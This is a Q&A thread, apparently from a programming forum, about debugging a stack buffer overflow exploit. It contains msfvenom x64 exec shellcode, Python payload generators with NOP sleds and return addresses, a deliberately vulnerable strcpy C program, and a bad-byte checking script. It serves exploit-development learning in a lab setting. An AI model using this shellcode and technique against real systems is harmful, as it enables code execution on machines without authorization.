
I use msfvenom-generated shellcode in a buffer overflow. Here's the command I used to create the shellcode for Linux x64:

msfvenom -p linux/x64/exec -f py -o shellcode.py -b '\x00' CMD=whoami

and here's my Python code to generate input.txt, which the program reads as its payload.

#!/usr/bin/env python3
from struct import pack
buffer = b''                    # bytes, not str: the payload is raw binary
buffer += b'\x90' * 177         # NOP sled
buffer += b"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d"
buffer += b"\x05\xef\xff\xff\xff\x48\xbb\x0c\xba\x64\x29\x60"
buffer += b"\x92\x04\x0b\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buffer += b"\xff\xe2\xf4\x44\x02\x4b\x4b\x09\xfc\x2b\x78\x64"
buffer += b"\xba\xfd\x79\x34\xcd\x56\x6d\x64\x97\x07\x7d\x3e"
buffer += b"\xc0\xec\x0c\x0c\xba\x64\x5e\x08\xfd\x65\x66\x65"
buffer += b"\xba\x32\x7e\x34\xcc\x6e\x30\x54\xb5\x61\x29\x60"
buffer += b"\x92\x04\x0b"
buffer += pack("<Q", 0x7fffffffd8c0)   # return address, little-endian
with open("input.txt", "wb") as f:     # binary mode so no newline translation happens
    f.write(buffer)

Here's my main vulnerable code.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int copytobuffer(char* input)
{
 char buffer[256];
 strcpy (buffer,input);   /* unbounded copy: input longer than 256 bytes overflows the stack frame */
 return 0;
}

int main (int argc, char *argv[])
{
 int local_variable = 1;
 (void)local_variable;
 copytobuffer(argv[1]);
 exit(0);
}

I need a 264-byte payload to overwrite the return address; the Python code above will generate the payload for that, but the biggest problem is that the shellcode contains 0x00 bad characters, even though I use the -b '0x00' argument in msfvenom.

[Screenshot: gdb memory dump of the shellcode at 0x7fffffffd948]

As we can see in the screenshot above, gdb shows 0x00 bytes in the shellcode (0x7fffffffd948) after the 0x90 (NOPs). I think that is the main reason why I cannot run the command. So basically the buffer contains about 216 bytes up to those 0x00 bytes; because of that, buffer[256] is not filled and the program exits normally.

Is there any way to generate shellcode without those bad characters? In my experience the msfvenom -b option does not work correctly.

  • The shellcode CLEARLY doesn't contain null bytes; you can see it from the Python code. Your bytes stop at the byte with value 0x09, i.e. a TAB. Are you passing the payload correctly on the command line? Commented 2 days ago
  • @Margaret Bloom, thanks for your answer, but the problem was due to where I placed that shellcode. Basically that shellcode contains push and pop instructions that interfere with the shellcode, and somewhere in that shellcode it pushes 0x00's into memory; that was the main reason the exploit failed. Basically placing the shellcode first and then the 0x90 (NOPs) solved my problem. Commented 2 days ago

1 Answer

The shellcode is not executing correctly because its location near the stack pointer (rsp) interacts poorly with its internal push/pop logic, which may be inadvertently pushing 0x00 (null bytes) onto the stack.

The short answer is: I solved it by inserting the shellcode before the 0x90 NOPs. Here's the Python code:

#!/usr/bin/env python3
from struct import pack
buffer = b''
buffer+= b"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d"
buffer+= b"\x05\xef\xff\xff\xff\x48\xbb\x2e\x99\x72\x9d\x84"
buffer+= b"\xbe\xc0\x63\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buffer+= b"\xff\xe2\xf4\x66\x21\x5d\xff\xed\xd0\xef\x10\x46"
buffer+= b"\x99\xeb\xcd\xd0\xe1\x92\x05\x46\xb4\x11\xc9\xda"
buffer+= b"\xec\x28\x64\x2e\x99\x72\xea\xec\xd1\xa1\x0e\x47"
buffer+= b"\x99\x24\xca\xd0\xe0\xaa\x58\x76\x96\x77\x9d\x84"
buffer+= b"\xbe\xc0\x63"
buffer += b'\x90'*177                 # NOP sled now follows the shellcode
buffer += pack("<Q", 0x7fffffffd870)  # return address, little-endian
print(len(buffer))                    # payload length in bytes (sys.getsizeof would include object overhead)
with open("input.txt", "wb") as f:
    f.write(buffer)

That solved my problem.

  • This is most likely not the real answer. The shellcode is just a standard Shikata ga nai encoder (i.e. a plain-old xor) and a straightforward call to execve using a literal pool technique. It pushes a small amount of data on the stack and surely not zeros. While the stack pointer being close to the shellcode is a common situation, it doesn't produce zero bytes but more erratic behaviour (data as code). I advise you to really understand what was going on (most likely you were passing it wrong) if you are serious about exploit design. You cannot be sloppy in this field. Commented 2 days ago
  • @Margaret Bloom maybe you are right, I'm new in that field; I have experience with malware dev and software dev, but the exploit dev field is completely unknown to me. Thanks again. Commented yesterday
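Margaret Bloom's comments point at how the payload is delivered rather than at the shellcode, and a byte-level check confirms it: the shellcode in the question contains no NUL, but it does contain 0x09 (TAB) at offset 43, which ends argv[1] early if the file is expanded by an unquoted shell substitution. The script below is an added example, not code from the question or the answer; it copies the question's payload layout and assumes the payload reaches the program as argv[1], possibly through shell word splitting with the default IFS.

```python
#!/usr/bin/env python3
"""Check a payload delivered through argv for bytes the delivery path drops.

Two constraints apply when input reaches the target as argv[1]:
  * a NUL (0x00) ends the C string, so strcpy() copies nothing after it;
  * if the file is expanded with unquoted shell word splitting, e.g.
    $(cat input.txt) (an assumption, not stated in the question), the IFS
    bytes (space, tab, newline) split it into several argv entries.
msfvenom -b '\\x00' only removes the first kind of byte."""
from struct import pack

# Shellcode bytes copied verbatim from the question's generator script.
SHELLCODE = (
    b"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d"
    b"\x05\xef\xff\xff\xff\x48\xbb\x0c\xba\x64\x29\x60"
    b"\x92\x04\x0b\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
    b"\xff\xe2\xf4\x44\x02\x4b\x4b\x09\xfc\x2b\x78\x64"
    b"\xba\xfd\x79\x34\xcd\x56\x6d\x64\x97\x07\x7d\x3e"
    b"\xc0\xec\x0c\x0c\xba\x64\x5e\x08\xfd\x65\x66\x65"
    b"\xba\x32\x7e\x34\xcc\x6e\x30\x54\xb5\x61\x29\x60"
    b"\x92\x04\x0b"
)
NOP_SLED = b"\x90" * 177
RET_ADDR = pack("<Q", 0x7fffffffd8c0)      # value used in the question
PAYLOAD = NOP_SLED + SHELLCODE + RET_ADDR  # same layout as the question's script

NUL = {0x00}
IFS = {0x20, 0x09, 0x0a}                   # bash's default word separators


def find_bad_bytes(payload, bad=frozenset(NUL | IFS)):
    """Return (offset, value) for every byte of `payload` found in `bad`."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def argv_length(payload, word_split=True):
    """Number of leading bytes of `payload` that actually reach argv[1].

    A NUL always ends the argument; with word splitting an IFS byte does too.
    """
    stop = (NUL | IFS) if word_split else NUL
    return next((i for i, b in enumerate(payload) if b in stop), len(payload))


if __name__ == "__main__":
    for off, val in find_bad_bytes(PAYLOAD):
        print(f"offset {off:3d}: 0x{val:02x}")
    print("argv[1] bytes if word-split:", argv_length(PAYLOAD))
    print("argv[1] bytes if quoted    :", argv_length(PAYLOAD, word_split=False))
```

With the question's layout the first bad byte is the TAB at offset 220 (177 NOPs + 43), close to the "about 216 bytes" the asker observed; the only NULs are the two high bytes of the packed return address at offsets 270 and 271.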
